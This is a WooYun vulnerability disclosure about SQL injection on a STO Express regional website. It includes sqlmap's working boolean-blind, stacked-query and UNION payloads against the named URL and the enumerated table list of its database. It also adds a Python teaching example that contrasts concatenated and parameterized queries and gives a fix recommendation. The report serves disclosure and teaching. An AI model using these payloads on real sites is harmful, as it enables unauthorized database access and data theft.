
Vulnerability summary (24 following)

Defect ID: wooyun-2016-0172232

Title: SQL injection vulnerability on a site belonging to STO Express (申通快递)

Vendor: STO Express (申通快递)

Author: 路人甲

Submitted: 2016-01-23 19:40

Fixed: 2016-03-08 21:29

Published: 2016-03-08 21:29

Vulnerability type: SQL injection

Severity (author): High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-23: Details sent to the vendor; awaiting vendor handling
2016-01-24: Vendor confirmed; details visible to the vendor only
2016-02-03: Details disclosed to core white hats and relevant domain experts
2016-02-13: Details disclosed to regular white hats
2016-02-23: Details disclosed to intern white hats
2016-03-08: Details disclosed to the public

Brief description:

Detailed description:

The Area parameter of /Dot.asp on www.gdsto.com.cn is injectable. The request below is the one fed to sqlmap; the asterisk after the value is sqlmap's injection marker, not part of the live request.

GET /Dot.asp?Area=-1' OR 1=1* --  HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.gdsto.com.cn/
Cookie: ASPSESSIONIDACBDCSSA=GANBFHOBEOMPODKONKIGHILO; ASPSESSIONIDACBADSTA=AHOJCDLCAKCKFIILHAAPCHIB
Host: www.gdsto.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

[screenshot: 4.png]

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 AND 6075=6075 --
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1;WAITFOR DELAY '0:0:5'-- --
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(88)+CHAR(102)+CHAR(76)+CHAR(99)+CHAR(77)+CHAR(116)+CHAR(87)+CHAR(97)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- --
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: zktime_st
[140 tables]
+------------------------------+
| acc_antiback |
| acc_device |
| acc_door |
| acc_firstopen |
| acc_firstopen_emp |
| acc_holidays |
| acc_interlock |
| acc_levelset |
| acc_levelset_door_group |
| acc_levelset_emp |
| acc_linkageio |
| acc_map |
| acc_mapdoorpos |
| acc_monitor_log |
| acc_morecardempgroup |
| acc_morecardgroup |
| acc_morecardset |
| acc_timeseg |
| acc_wiegandfmt |
| action_log |
| areaadmin |
| att_attreport |
| att_overtime |
| att_waitforprocessdata |
| attcalclog |
| attexception |
| attparam |
| attrecabnormite |
| attshifts |
| auth_group |
| auth_group_permissions |
| auth_message |
| auth_permission |
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| base_additiondata |
| base_appoption |
| base_basecode |
| base_datatranslation |
| base_operatortemplate |
| base_option |
| base_personaloption |
| base_strresource |
| base_strtranslation |
| base_systemoption |
| checkexact |
| checkinout |
| dbapp_viewmodel |
| dbbackuplog |
| departments |
| deptadmin |
| devcmds |
| devcmds_bak |
| devlog |
| django_content_type |
| django_session |
| empitemdefine |
| facetemplate |
| holidays |
| iclock |
| iclock_dininghall |
| iclock_dstime |
| iclock_notice |
| iclock_oplog |
| iclock_testdata |
| iclock_testdata_admin_area |
| iclock_testdata_admin_dept |
| leaveclass |
| leaveclass1 |
| meeting_detailmeeting |
| meeting_leave |
| meeting_meetingemp |
| meeting_meetingentity |
| meeting_meetingexact |
| meeting_meetingreport |
| meeting_originalrecord |
| meeting_room |
| meeting_room_devices |
| meeting_statisticsmeeting |
| meeting_type |
| meeting_validrecord |
| num_run |
| num_run_deil |
| operatecmds |
| personnel_area |
| personnel_cardtype |
| personnel_cities |
| personnel_countries |
| personnel_education |
| personnel_empchange |
| personnel_iccard |
| personnel_iccard_posmeal |
| personnel_iccard_use_mechine |
| personnel_issuecard |
| personnel_leavelog |
| personnel_meal |
| personnel_national |
| personnel_positions |
| personnel_state |
| pos_allowance |
| pos_allowancesetting |
| pos_batchtime |
| pos_carcashsz |
| pos_carcashszbak |
| pos_carcashtype |
| pos_cardmanage |
| pos_cardserial |
| pos_errors |
| pos_handconsume |
| pos_icconsumerlist |
| pos_icconsumerlistbak |
| pos_keydetail |
| pos_keyvalue |
| pos_keyvalue_use_mechine |
| pos_loseunitecard |
| pos_merchandise |
| pos_posdevlog |
| pos_poslog |
| pos_replenishcard |
| pos_splittime |
| pos_splittime_use_mechine |
| pos_storedetail |
| pos_timebrush |
| pos_timedetail |
| pos_timeslice |
| posparam |
| schclass |
| setuseratt |
| template |
| user_of_run |
| user_speday |
| user_temp_sch |
| userinfo |
| userinfo_attarea |
| useruusedsclasses |
| worktable_groupmsg |
| worktable_instantmsg |
| worktable_msgtype |
| worktable_usrmsg |
+------------------------------+
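sqlmap found three injection techniques on the same parameter: boolean-based blind (a known-true condition 6075=6075 versus a known-false one changes the page), stacked queries (the MSSQL-specific WAITFOR DELAY, which only works because the driver allowed a second statement after ;), and a 10-column UNION whose CHAR(113)+CHAR(106)+... chain is sqlmap's way of smuggling a marker string past quote filtering; that chain decodes to qjqxqBXfLcMtWaaqqzpq. The block below is an added example, not part of the original report and not STO Express's code. It reproduces the concatenation pattern the payloads imply for Dot.asp against an in-memory SQLite table (table and column names are assumptions; the live back end was Microsoft SQL Server 2005, so the UNION probe is rewritten with SQLite's || and 3 columns), shows the boolean oracle and UNION result next to the parameterized version of the same lookup, and includes a small decoder for sqlmap's CHAR() chains.

```python
import re
import sqlite3

# Constructed sample rows standing in for whatever Dot.asp reads. SQLite is
# used only so the example runs offline; the live site ran MSSQL 2005.
SAMPLE_ROWS = [
    (1, "Guangzhou", "020-00000000"),
    (2, "Shenzhen", "0755-00000000"),
    (3, "Foshan", "0757-00000000"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE outlets (id INTEGER, area TEXT, phone TEXT)")
    conn.executemany("INSERT INTO outlets VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def query_vulnerable(conn, area):
    """String concatenation, the pattern the report's payloads imply for Dot.asp:
    the Area value is spliced into the SQL text, so a quote closes the literal
    and everything after it is parsed as SQL."""
    sql = "SELECT id, area, phone FROM outlets WHERE area = '" + area + "'"
    return conn.execute(sql).fetchall()


def query_parameterized(conn, area):
    """Same lookup with a bound parameter: the value travels separately from
    the statement text, so quotes and comment markers stay data."""
    sql = "SELECT id, area, phone FROM outlets WHERE area = ?"
    return conn.execute(sql, (area,)).fetchall()


# The boolean-based blind payload from the sqlmap output and its 'false' twin.
# AND binds tighter than OR, so the tail reads: area='-1' OR (1=1 AND 6075=6075).
TRUE_PAYLOAD = "-1' OR 1=1 AND 6075=6075 -- "
FALSE_PAYLOAD = "-1' OR 1=1 AND 6075=6076 -- "


def boolean_oracle(conn, payload):
    """What sqlmap measures for a blind injection: a known-true condition must
    produce a different response than a known-false one. The row count stands
    in for the page difference that Dot.asp leaked."""
    return len(query_vulnerable(conn, payload))


# UNION probe in SQLite syntax (MSSQL concatenates with +; the live query had
# 10 columns, this table has 3). char(113)||char(106)||char(113) is "qjq".
UNION_PAYLOAD = "-1' UNION ALL SELECT NULL, char(113)||char(106)||char(113), NULL -- "


def union_rows(conn):
    """Attacker-chosen values come back in a column the page renders."""
    return query_vulnerable(conn, UNION_PAYLOAD)


CHAR_RE = re.compile(r"CHAR\((\d+)\)", re.IGNORECASE)


def decode_char_chain(expr):
    """Turn sqlmap's CHAR(n)+CHAR(n)+... construction back into the string it
    encodes, handy when reading payloads out of IIS logs or a report like this."""
    return "".join(chr(int(n)) for n in CHAR_RE.findall(expr))


if __name__ == "__main__":
    db = make_db()
    print("concatenated, true :", boolean_oracle(db, TRUE_PAYLOAD))
    print("concatenated, false:", boolean_oracle(db, FALSE_PAYLOAD))
    print("parameterized      :", query_parameterized(db, TRUE_PAYLOAD))
    print("union              :", union_rows(db))
    print("sqlmap marker      :", decode_char_chain(
        "CHAR(113)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(113)"))
```

With concatenation the true payload returns every row and the false payload none, which is exactly the differential sqlmap used; the parameterized lookup returns nothing for either, because the whole payload is compared as a literal area name. The fix for Dot.asp is the same change in classic ASP: an ADODB.Command with a typed parameter instead of building the SELECT from Request("Area"), plus running the site's database login with rights limited to the tables the page needs, since the sqlmap output shows the injected login could enumerate all 140 tables of zktime_st, including auth_user and the personnel_* and pos_* tables.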

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, credit the source as 路人甲@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity (vendor): Medium

Vulnerability Rank: 5

Confirmed: 2016-01-24 13:51

Vendor reply:

Thanks.

Latest status:

None yet